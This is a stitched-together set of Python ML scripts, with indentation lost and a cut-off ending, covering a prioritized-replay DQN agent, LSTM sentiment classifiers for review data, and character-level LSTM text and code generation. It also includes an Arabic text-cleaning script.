randomAgent = RandomAgent(actionCnt, brain)
step = 0
try:
print("Initialization with random agent...")
while randomAgent.exp < MEMORY_CAPACITY:
step += 1
env.run(randomAgent, step)
print(randomAgent.exp, "/", MEMORY_CAPACITY)
agent.memory = randomAgent.memory
randomAgent = None
print("Starting learning")
for i in tqdm.tqdm(list(range(step+1, episodes+step+1))):
env.run(agent, i)
finally:
agent.brain.model.save("Seaquest-DQN-PER.h5")
import numpy as np
class SumTree:
"""
This SumTree code is modified version of Morvan Zhou:
https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/blob/master/contents/5.2_Prioritized_Replay_DQN/RL_brain.py
"""
data_pointer = 0
def __init__(self, length):
# number of leaf nodes (final nodes that contains experiences)
self.length = length
# generate the tree with all nodes' value = 0
# binary node (each node has max 2 children) so 2x size of leaf capacity - 1
# parent nodes = length - 1
# leaf nodes = length
self.tree = np.zeros(2*self.length - 1)
# contains the experiences
self.data = np.zeros(self.length, dtype=object)
def add(self, priority, data):
"""
Add priority score in the sumtree leaf and add the experience in data
"""
# look at what index we want to put the experience
tree_index = self.data_pointer + self.length - 1
#tree:
# 0
# / \
# 0 0
# / \ / \
#tree_index 0 0 0 We fill the leaves from left to right
self.data[self.data_pointer] = data
# update the leaf
self.update(tree_index, priority)
# increment data pointer
self.data_pointer += 1
# if we're above the capacity, we go back to the first index
if self.data_pointer >= self.length:
self.data_pointer = 0
def update(self, tree_index, priority):
"""
Update the leaf priority score and propagate the change through the tree
"""
# change = new priority score - former priority score
change = priority - self.tree[tree_index]
self.tree[tree_index] = priority
while tree_index != 0: # this method is faster than the recursive loop in the reference code
"""
Here we want to access the line above
THE NUMBERS IN THIS TREE ARE THE INDEXES NOT THE PRIORITY VALUES
0
/ \
1 2
/ \ / \
3 4 5 [6]
If we are in leaf at index 6, we updated the priority score
We need then to update index 2 node
So tree_index = (tree_index - 1) // 2
tree_index = (6-1)//2
tree_index = 2 (because // round the result)
"""
tree_index = (tree_index - 1) // 2
self.tree[tree_index] += change
"""
Here we get the leaf_index, priority value of that leaf and experience associated with that index
"""
def get_leaf(self, v):
"""
Tree structure and array storage:
Tree index:
0 -> storing priority sum
/ \
1 2
/ \ / \
3 4 5 6 -> storing priority for experiences
Array type for storing:
[0,1,2,3,4,5,6]
"""
parent_index = 0
while True: # the while loop is faster than the method in the reference code
left_child_index = 2 * parent_index + 1
right_child_index = left_child_index + 1
# If we reach bottom, end the search
if left_child_index >= len(self.tree):
leaf_index = parent_index
break
else: # downward search, always search for a higher priority node
if v <= self.tree[left_child_index]:
parent_index = left_child_index
else:
v -= self.tree[left_child_index]
parent_index = right_child_index
data_index = leaf_index - self.length + 1
return leaf_index, self.tree[leaf_index], self.data[data_index]
property
def total_priority(self):
return self.tree[0] # Returns the root node
class Memory:
# we use this to avoid some experiences to have 0 probability of getting picked
PER_e = 0.01
# we use this to make a tradeoff between taking only experiences with high priority
# and sampling randomly
PER_a = 0.6
# we use this for importance sampling, from this to 1 through the training
PER_b = 0.4
PER_b_increment_per_sample = 0.001
absolute_error_upper = 1.0
def __init__(self, capacity):
# the tree is composed of a sum tree that contains the priority scores and his leaf
# and also a data list
# we don't use deque here because it means that at each timestep our experiences change index by one
# we prefer to use a simple array to override when the memory is full
self.tree = SumTree(length=capacity)
def store(self, experience):
"""
Store a new experience in our tree
Each new experience have a score of max_priority (it'll be then improved)
"""
# find the max priority
max_priority = np.max(self.tree.tree[-self.tree.length:])
# if the max priority = 0 we cant put priority = 0 since this exp will never have a chance to be picked
# so we use a minimum priority
if max_priority == 0:
max_priority = self.absolute_error_upper
# set the max p for new p
self.tree.add(max_priority, experience)
def sample(self, n):
"""
- First, to sample a minimatch of k size, the range [0, priority_total] is / into k ranges.
- then a value is uniformly sampled from each range
- we search in the sumtree, the experience where priority score correspond to sample values are
retrieved from.
- then, we calculate IS weights for each minibatch element
"""
# create a sample list that will contains the minibatch
memory = []
b_idx, b_is_weights = np.zeros((n, ), dtype=np.int32), np.zeros((n, 1), dtype=np.float32)
# calculate the priority segment
# here, as explained in the paper, we divide the range [0, ptotal] into n ranges
priority_segment = self.tree.total_priority / n
# increase b each time
self.PER_b = np.min([1., self.PER_b + self.PER_b_increment_per_sample])
# calculating the max weight
p_min = np.min(self.tree.tree[-self.tree.length:]) / self.tree.total_priority
max_weight = (p_min * n) ** (-self.PER_b)
for i in range(n):
a, b = priority_segment * i, priority_segment * (i + 1)
value = np.random.uniform(a, b)
# experience that correspond to each value is retrieved
index, priority, data = self.tree.get_leaf(value)
# P(j)
sampling_probs = priority / self.tree.total_priority
# IS = (1/N * 1/P(i))**b /max wi == (N*P(i))**-b /max wi
b_is_weights[i, 0] = np.power(n * sampling_probs, -self.PER_b)/ max_weight
b_idx[i]= index
experience = [data]
memory.append(experience)
return b_idx, memory, b_is_weights
def batch_update(self, tree_idx, abs_errors):
"""
Update the priorities on the tree
"""
abs_errors += self.PER_e
clipped_errors = np.min([abs_errors, self.absolute_error_upper])
ps = np.power(clipped_errors, self.PER_a)
for ti, p in zip(tree_idx, ps):
self.tree.update(ti, p)
import tensorflow as tf
class DDDQNNet:
""" Dueling Double Deep Q Neural Network """
def __init__(self, state_size, action_size, learning_rate, name):
self.state_size = state_size
self.action_size = action_size
self.learning_rate = learning_rate
self.name = name
# we use tf.variable_scope to know which network we're using (DQN or the Target net)
# it'll be helpful when we will update our w- parameters (by copy the DQN parameters)
with tf.variable_scope(self.name):
# we create the placeholders
self.inputs_ = tf.placeholder(tf.float32, [None, *state_size], name="inputs")
self.is_weights_ = tf.placeholder(tf.float32, [None, 1], name="is_weights")
self.actions_ = tf.placeholder(tf.float32, [None, self.action_size], name="actions_")
# target Q
self.target_q = tf.placeholder(tf.float32, [None], name="target")
# neural net
self.dense1 = tf.layers.dense(inputs=self.inputs_,
units=32,
name="dense1",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense2 = tf.layers.dense(inputs=self.dense1,
units=32,
name="dense2",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense3 = tf.layers.dense(inputs=self.dense2,
units=32,
name="dense3",
kernel_initializer=tf.contrib.layers.xavier_initializer())
# here we separate into two streams (dueling)
# this one is State-Function V(s)
self.value = tf.layers.dense(inputs=self.dense3,
units=1,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation=None,
name="value"
)
# and this one is Value-Function A(s, a)
self.advantage = tf.layers.dense(inputs=self.dense3,
units=self.action_size,
activation=None,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="advantage"
)
# aggregation
# Q(s, a) = V(s) + ( A(s, a) - 1/|A| * sum A(s, a') )
self.output = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keepdims=True))
# Q is our predicted Q value
self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_))
self.absolute_errors = tf.abs(self.target_q - self.Q)
# w- * (target_q - q)**2
self.loss = tf.reduce_mean(self.is_weights_ * tf.squared_difference(self.target_q, self.Q))
self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.loss)
import numpy
class SumTree:
write = 0
def __init__(self, capacity):
self.capacity = capacity
self.tree = numpy.zeros( 2*capacity - 1 )
self.data = numpy.zeros( capacity, dtype=object )
def _propagate(self, idx, change):
parent = (idx - 1) // 2
self.tree[parent] += change
if parent != 0:
self._propagate(parent, change)
def _retrieve(self, idx, s):
left = 2 * idx + 1
right = left + 1
if left >= len(self.tree):
return idx
if s <= self.tree[left]:
return self._retrieve(left, s)
else:
return self._retrieve(right, s-self.tree[left])
def total(self):
return self.tree[0]
def add(self, p, data):
idx = self.write + self.capacity - 1
self.data[self.write] = data
self.update(idx, p)
self.write += 1
if self.write >= self.capacity:
self.write = 0
def update(self, idx, p):
change = p - self.tree[idx]
self.tree[idx] = p
self._propagate(idx, change)
def get(self, s):
idx = self._retrieve(0, s)
dataIdx = idx - self.capacity + 1
return (idx, self.tree[idx], self.data[dataIdx])
import numpy as np
from string import punctuation
from collections import Counter
from sklearn.model_selection import train_test_split
with open("data/reviews.txt") as f:
reviews = f.read()
with open("data/labels.txt") as f:
labels = f.read()
# remove all punctuations
all_text = ''.join([ c for c in reviews if c not in punctuation ])
reviews = all_text.split("\n")
reviews = [ review.strip() for review in reviews ]
all_text = ' '.join(reviews)
words = all_text.split()
print("Total words:", len(words))
# encoding the words
# dictionary that maps vocab words to integers here
vocab = sorted(set(words))
print("Unique words:", len(vocab))
# start is 1 because 0 is encoded for blank
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# encoded reviews
encoded_reviews = []
for review in reviews:
encoded_reviews.append([vocab2int[word] for word in review.split()])
encoded_reviews = np.array(encoded_reviews)
# print("Number of reviews:", len(encoded_reviews))
# encode the labels, 1 for 'positive' and 0 for 'negative'
labels = labels.split("\n")
labels = [1 if label is 'positive' else 0 for label in labels]
# print("Number of labels:", len(labels))
review_lens = [len(x) for x in encoded_reviews]
counter_reviews_lens = Counter(review_lens)
# remove any reviews with 0 length
cleaned_encoded_reviews, cleaned_labels = [], []
for review, label in zip(encoded_reviews, labels):
if len(review) != 0:
cleaned_encoded_reviews.append(review)
cleaned_labels.append(label)
encoded_reviews = np.array(cleaned_encoded_reviews)
labels = cleaned_labels
# print("Number of reviews:", len(encoded_reviews))
# print("Number of labels:", len(labels))
sequence_length = 200
features = np.zeros((len(encoded_reviews), sequence_length), dtype=int)
for i, review in enumerate(encoded_reviews):
features[i, -len(review):] = review[:sequence_length]
# print(features[:10, :100])
# split data into train, validation and test
split_frac = 0.9
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=1-split_frac)
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.5)
print(f"""Features shapes:
Train set: {X_train.shape}
Validation set: {X_validation.shape}
Test set: {X_test.shape}""")
print("Example:")
print(X_train[0])
print(y_train[0])
# X_train, X_validation = features[:split_frac*len(features)], features[split_frac*len(features):]
# y_train, y_validation = labels[:split]
import tensorflow as tf
from utils import get_batches
from train import *
import tensorflow as tf
from preprocess import vocab2int, X_train, y_train, X_validation, y_validation, X_test, y_test
from utils import get_batches
import numpy as np
def get_lstm_cell():
# basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# dropout to the cell
drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop
# RNN paramaters
lstm_size = 256
lstm_layers = 1
batch_size = 256
learning_rate = 0.001
n_words = len(vocab2int) + 1 # Added 1 for the 0 that is for padding
# create the graph object
graph = tf.Graph()
# add nodes to the graph
with graph.as_default():
inputs = tf.placeholder(tf.int32, (None, None), "inputs")
labels = tf.placeholder(tf.int32, (None, None), "labels")
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
# number of units in the embedding layer
embedding_size = 300
with graph.as_default():
# embedding lookup matrix
embedding = tf.Variable(tf.random_uniform((n_words, embedding_size), -1, 1))
# pass to the LSTM cells
embed = tf.nn.embedding_lookup(embedding, inputs)
# stackup multiple LSTM layers
cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell() for i in range(lstm_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
# pass cell and input to cell, returns outputs for each time step
# and the final state of the hidden layer
# run the data through the rnn nodes
outputs, final_state = tf.nn.dynamic_rnn(cell, embed, initial_state=initial_state)
# grab the last output
# use sigmoid for binary classification
predictions = tf.contrib.layers.fully_connected(outputs[:, -1], 1, activation_fn=tf.sigmoid)
# calculate cost using MSE
cost = tf.losses.mean_squared_error(labels, predictions)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
# nodes to calculate the accuracy
correct_pred = tf.equal(tf.cast(tf.round(predictions), tf.int32), labels)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
saver = tf.train.Saver()
########### training ##########
epochs = 10
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
iteration = 1
for e in range(epochs):
state = sess.run(initial_state)
for i, (x, y) in enumerate(get_batches(X_train, y_train, batch_size=batch_size)):
y = np.array(y)
x = np.array(x)
feed = {inputs: x, labels: y[:, None],
keep_prob: 0.5,
initial_state: state}
loss, state, _ = sess.run([cost, final_state, optimizer], feed_dict=feed)
if iteration % 5 == 0:
print(f"[Epoch: {e}/{epochs}] Iteration: {iteration} Train loss: {loss:.3f}")
if iteration % 25 == 0:
val_acc = []
val_state = sess.run(cell.zero_state(batch_size, tf.float32))
for x, y in get_batches(X_validation, y_validation, batch_size=batch_size):
x, y = np.array(x), np.array(y)
feed = {inputs: x, labels: y[:, None],
keep_prob: 1, initial_state: val_state}
batch_acc, val_state = sess.run([accuracy, final_state], feed_dict=feed)
val_acc.append(batch_acc)
print(f"val_acc: {np.mean(val_acc):.3f}")
iteration += 1
saver.save(sess, "chechpoints/sentiment1.ckpt")
test_acc = []
with tf.Session(graph=graph) as sess:
saver = tf.train.Saver()
saver.restore(sess, tf.train.latest_checkpoint('checkpoints'))
test_state = sess.run(cell.zero_state(batch_size, tf.float32))
for ii, (x, y) in enumerate(get_batches(X_test, y_test, batch_size), 1):
feed = {inputs: x,
labels: y[:, None],
keep_prob: 1,
initial_state: test_state}
batch_acc, test_state = sess.run([accuracy, final_state], feed_dict=feed)
test_acc.append(batch_acc)
print("Test accuracy: {:.3f}".format(np.mean(test_acc)))
def get_batches(x, y, batch_size=100):
n_batches = len(x) // batch_size
x, y = x[:n_batches*batch_size], y[:n_batches*batch_size]
for i in range(0, len(x), batch_size):
yield x[i: i+batch_size], y[i: i+batch_size]
import numpy as np
import pandas as pd
import tqdm
from string import punctuation
punc = set(punctuation)
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
X = np.zeros((len(df), 2), dtype=object)
for i in tqdm.tqdm(range(len(df)), "Cleaning X"):
target = df['Text'].loc[i]
# X.append(''.join([ c.lower() for c in target if c not in punc ]))
X[i, 0] = ''.join([ c.lower() for c in target if c not in punc ])
X[i, 1] = df['Score'].loc[i]
pd.DataFrame(X, columns=["Text", "Score"]).to_csv("data/Reviews.csv")
### Model Architecture hyper parameters
embedding_size = 64
# sequence_length = 500
sequence_length = 42
LSTM_units = 128
### Training parameters
batch_size = 128
epochs = 20
### Preprocessing parameters
# words that occur less than n times to be deleted from dataset
N = 10
# test size in ratio, train size is 1 - test_size
test_size = 0.15
from keras.models import Sequential
from keras.layers import Embedding, LSTM, Dense, Activation, LeakyReLU, Dropout, TimeDistributed
from keras.layers import SpatialDropout1D
from config import LSTM_units
def get_model_binary(vocab_size, sequence_length):
embedding_size = 64
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation='sigmoid'))
model.summary()
return model
def get_model_5stars(vocab_size, sequence_length, embedding_size, verbose=0):
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation="linear"))
if verbose:
model.summary()
return model
import numpy as np
import pandas as pd
import tqdm
import pickle
from collections import Counter
from sklearn.model_selection import train_test_split
from utils import clean_text, tokenize_words
from config import N, test_size
def load_review_data():
# df = pd.read_csv("data/Reviews.csv")
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
# preview
print(df.head())
print(df.tail())
vocab = []
# X = np.zeros((len(df)*2, 2), dtype=object)
X = np.zeros((len(df), 2), dtype=object)
# for i in tqdm.tqdm(range(len(df)), "Cleaning X1"):
# target = df['Text'].loc[i]
# score = df['Score'].loc[i]
# X[i, 0] = clean_text(target)
# X[i, 1] = score
# for word in X[i, 0].split():
# vocab.append(word)
# k = i+1
k = 0
for i in tqdm.tqdm(range(len(df)), "Cleaning X2"):
target = df['Summary'].loc[i]
score = df['Score'].loc[i]
X[i+k, 0] = clean_text(target)
X[i+k, 1] = score
for word in X[i+k, 0].split():
vocab.append(word)
# vocab = set(vocab)
vocab = Counter(vocab)
# delete words that occur less than 10 times
vocab = { k:v for k, v in vocab.items() if v >= N }
# word to integer encoder dict
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# pickle int2vocab for testing
print("Pickling vocab2int...")
pickle.dump(vocab2int, open("data/vocab2int.pickle", "wb"))
# encoded reviews
for i in tqdm.tqdm(range(X.shape[0]), "Tokenizing words"):
X[i, 0] = tokenize_words(str(X[i, 0]), vocab2int)
lengths = [ len(row) for row in X[:, 0] ]
print("min_length:", min(lengths))
print("max_length:", max(lengths))
X_train, X_test, y_train, y_test = train_test_split(X[:, 0], X[:, 1], test_size=test_size, shuffle=True, random_state=19)
return X_train, X_test, y_train, y_test, vocab
import os
# disable keras loggings
import sys
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
import keras
sys.stderr = stderr
# to use CPU
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from model import get_model_5stars
from utils import clean_text, tokenize_words
from config import embedding_size, sequence_length
from keras.preprocessing.sequence import pad_sequences
import pickle
vocab2int = pickle.load(open("data/vocab2int.pickle", "rb"))
model = get_model_5stars(len(vocab2int), sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V20_0.38_0.80.h5")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Food Review evaluator")
parser.add_argument("review", type=str, help="The review of the product in text")
args = parser.parse_args()
review = tokenize_words(clean_text(args.review), vocab2int)
x = pad_sequences([review], maxlen=sequence_length)
print(f"{model.predict(x)[0][0]:.2f}/5")
# to use CPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import os
import numpy as np
import pandas as pd
from keras.callbacks import ModelCheckpoint
from keras.preprocessing import sequence
from preprocess import load_review_data
from model import get_model_5stars
from config import sequence_length, embedding_size, batch_size, epochs
X_train, X_test, y_train, y_test, vocab = load_review_data()
vocab_size = len(vocab)
print("Vocab size:", vocab_size)
X_train = sequence.pad_sequences(X_train, maxlen=sequence_length)
X_test = sequence.pad_sequences(X_test, maxlen=sequence_length)
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
model = get_model_5stars(vocab_size, sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V40_0.60_0.67.h5")
model.compile(loss="mse", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/model_V40_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=True, verbose=1)
model.fit(X_train, y_train, epochs=epochs,
validation_data=(X_test, y_test),
batch_size=batch_size,
callbacks=[checkpointer])
import numpy as np
from string import punctuation
# make it a set to accelerate tests
punc = set(punctuation)
def clean_text(text):
return ''.join([ c.lower() for c in str(text) if c not in punc ])
def tokenize_words(words, vocab2int):
words = words.split()
tokenized_words = np.zeros((len(words),))
for j in range(len(words)):
try:
tokenized_words[j] = vocab2int[words[j]]
except KeyError:
# didn't add any unk, just ignore
pass
return tokenized_words
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
seed = "import os"
# output:
# ded of and alice as it go on and the court
# well you wont you wouldncopy thing
# there was not a long to growing anxiously any only a low every cant
# go on a litter which was proves of any only here and the things and the mort meding and the mort and alice was the things said to herself i cant remeran as if i can repeat eften to alice any of great offf its archive of and alice and a cancur as the mo
char2int = pickle.load(open("python-char2int.pickle", "rb"))
int2char = pickle.load(open("python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(400), "Generating text"):
# make the input sequence
X = np.zeros((1, sequence_length, n_unique_chars))
for t, char in enumerate(seed):
X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
# predict the next character
predicted = model.predict(X, verbose=0)[0]
# converting the vector to an integer
next_index = np.argmax(predicted)
# converting the integer to a character
next_char = int2char[next_index]
# add the character to results
generated += next_char
# shift seed and the predicted character
seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import numpy as np
import os
import pickle
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from keras.callbacks import ModelCheckpoint
from utils import get_batches
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
from string import punctuation
# read the data
# text = open("data/wonderland.txt", encoding="utf-8").read()
text = open("E:\\datasets\\text\\my_python_code.py").read()
# remove caps
text = text.lower()
for c in "!":
text = text.replace(c, "")
# text = text.lower().replace("\n\n", "\n").replace("", "").replace("", "").replace("", "").replace("", "")
# text = text.translate(str.maketrans("", "", punctuation))
# text = text[:100_000]
n_chars = len(text)
unique_chars = ''.join(sorted(set(text)))
print("unique_chars:", unique_chars)
n_unique_chars = len(unique_chars)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(unique_chars)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(unique_chars)}
# save these dictionaries for later generation
pickle.dump(char2int, open("python-char2int.pickle", "wb"))
pickle.dump(int2char, open("python-int2char.pickle", "wb"))
# hyper parameters
sequence_length = 100
step = 1
batch_size = 128
epochs = 1
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length, step):
sentences.append(text[i: i + sequence_length])
y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
X = get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps=step)
# for i, x in enumerate(X):
# if i == 1:
# break
# print(x[0].shape, x[1].shape)
# # vectorization
# X = np.zeros((len(sentences), sequence_length, n_unique_chars))
# y = np.zeros((len(sentences), n_unique_chars))
# for i, sentence in enumerate(sentences):
# for t, char in enumerate(sentence):
# X[i, t, char2int[char]] = 1
# y[i, char2int[y_train[i]]] = 1
# X = np.array([char2int[c] for c in text])
# print("X.shape:", X.shape)
# goal of X is (n_samples, sequence_length, n_chars)
# sentences = np.zeros(())
# print("y.shape:", y.shape)
# building the model
# model = Sequential([
# LSTM(128, input_shape=(sequence_length, n_unique_chars)),
# Dense(n_unique_chars, activation="softmax"),
# ])
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpoint = ModelCheckpoint("results/python-v2-{loss:.2f}.h5", verbose=1)
# model.fit(X, y, batch_size=batch_size, epochs=epochs, callbacks=[checkpoint])
model.fit_generator(X, steps_per_epoch=len(sentences) // batch_size, epochs=epochs, callbacks=[checkpoint])
import numpy as np
def get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps):
chars_per_batch = batch_size * n_steps
n_batches = len(sentences) // chars_per_batch
while True:
for i in range(0, len(sentences), batch_size):
X = np.zeros((batch_size, sequence_length, n_unique_chars))
y = np.zeros((batch_size, n_unique_chars))
for i, sentence in enumerate(sentences[i: i+batch_size]):
for t, char in enumerate(sentence):
X[i, t, char2int[char]] = 1
y[i, char2int[y_train[i]]] = 1
yield X, y
from pyarabic.araby import ALPHABETIC_ORDER
with open("quran.txt", encoding="utf8") as f:
text = f.read()
unique_chars = set(text)
print("unique chars:", unique_chars)
arabic_alpha = { c for c, order in ALPHABETIC_ORDER.items() }
to_be_removed = unique_chars - arabic_alpha
to_be_removed = to_be_removed - {'.', ' ', ''}
print(to_be_removed)
text = text.replace("", ".")
for char in to_be_removed:
text = text.replace(char, "")
text = text.replace(" ", " ")
text = text.replace(" \n", "")
text = text.replace("\n ", "")
with open("quran_cleaned.txt", "w", encoding="utf8") as f:
print(text, file=f)
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
from utils import read_data, text_to_sequence, get_batches, get_data
from models import rnn_model
from keras.layers import LSTM
import numpy as np
text, int2char, char2int = read_data()
batch_size = 256
test_size = 0.2
n_steps = 200
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
X, Y = get_data(X_train, batch_size, n_steps, vocab_size=vocab_size+1)
print(X.shape)
print(Y.shape)
# cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True
model = KerasClassifier(build_fn=rnn_model, input_dim=n_steps, cell=LSTM, num_layers=2, dropout=0.2, output_dim=vocab_size+1,
batch_normalization=True, bidirectional=True)
params = {
"units": [100, 128, 200, 256, 300]
}
grid = GridSearchCV(estimator=model, param_grid=params)
grid_result = grid.fit(X, Y)
print(grid_result.best_estimator_)
print(grid_result.best_params_)
print(grid_result.best_score_)
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed, Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
# if bidirectional:
# model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
# else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if i == num_layers - 1:
return_sequences = False
else:
return_sequences = True
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=return_sequences)))
else:
model.add(cell(units, return_sequences=return_sequences))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(output_dim, activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
return model
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import rnn_model
from keras.layers import LSTM
from utils import sequence_to_text, get_data
import numpy as np
import pickle
char2int = pickle.load(open("results/char2int.pickle", "rb"))
int2char = { v:k for k, v in char2int.items() }
print(int2char)
n_steps = 500
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return int2char[np.argmax(logits, axis=0)]
# return ''.join([int2char[prediction] for prediction in np.argmax(logits, 1)])
def generate_code(model, initial_text, n_chars=100):
new_chars = ""
for i in range(n_chars):
x = np.array(text_to_sequence(initial_text))
x, _ = get_data(x, 64, n_steps, 1)
pred = model.predict(x)[0][0]
c = logits_to_text(pred)
new_chars += c
initial_text += c
return new_chars
model = rnn_model(input_dim=n_steps, output_dim=99, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
model.load_weights("results/rnn_3.5")
x = """x = np.array(text_to_sequence(x))
x, _ = get_data(x, n_steps, 1)
print(x.shape)
print(x.shape)
print(model.predict_proba(x))
print(model.predict_classes(x))
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_chars.char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, len(train_chars.vocab))
samples.append(train_chars.int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
